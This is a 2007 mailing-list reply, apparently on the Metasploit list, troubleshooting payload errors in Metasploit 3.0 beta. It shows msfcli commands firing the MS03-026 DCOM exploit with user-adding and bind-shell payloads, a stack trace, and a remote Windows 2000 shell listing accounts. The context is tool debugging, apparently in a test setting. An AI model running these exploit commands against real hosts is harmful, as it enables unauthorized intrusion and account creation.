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Re: windows/exec Payload problems.

From: a10n3.s7r1k3r at (Kashif Iftikhar)
Date: Wed, 24 Jan 2007 13:49:20 +0000

Here is some additional info.

I get the same error when I use the payload windows/adduser but the
user gets added even after getting the error.

Also, if I terminate the windows session by typing "exit" in windows
shell, I seem to be able to exploit the same box again in MSF3. So the
repeated exploiting problem is resolved but the payload issue still

Here is the sample output.

root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
"exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/adduser"
RHOST="" USER="kkj1" PASS="kkj1" E
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:[135]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:[135]
[*] Sending exploit ...
Exploit failed: end of file reached
./lib/rex/io/stream.rb:58:in `sysread'
./lib/rex/io/stream.rb:58:in `read'
./lib/rex/io/stream.rb:181:in `get_once'
./lib/rex/proto/dcerpc/client.rb:150:in `read'
./lib/rex/proto/dcerpc/client.rb:230:in `call'
./lib/msf/core/exploit/dcerpc.rb:97:in `dcerpc_call'
./lib/msf/core/exploit_driver.rb:189:in `job_run_proc'
./lib/msf/core/exploit_driver.rb:152:in `run'
./lib/msf/base/simple/exploit.rb:118:in `exploit_simple'
./lib/msf/base/simple/exploit.rb:127:in `exploit_simple'

root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
PAYLOAD="windows/shell/bind_tcp" RHOST="" E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:[135]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:[135]
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened ( ->

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>net user
net user

User accounts for \\

Administrator            Guest                    IUSR_COMPULIFE
IWAM_COMPULIFE           kkj                      kkj1
The command completed with one or more errors.


Abort session 1? [y/N]  y

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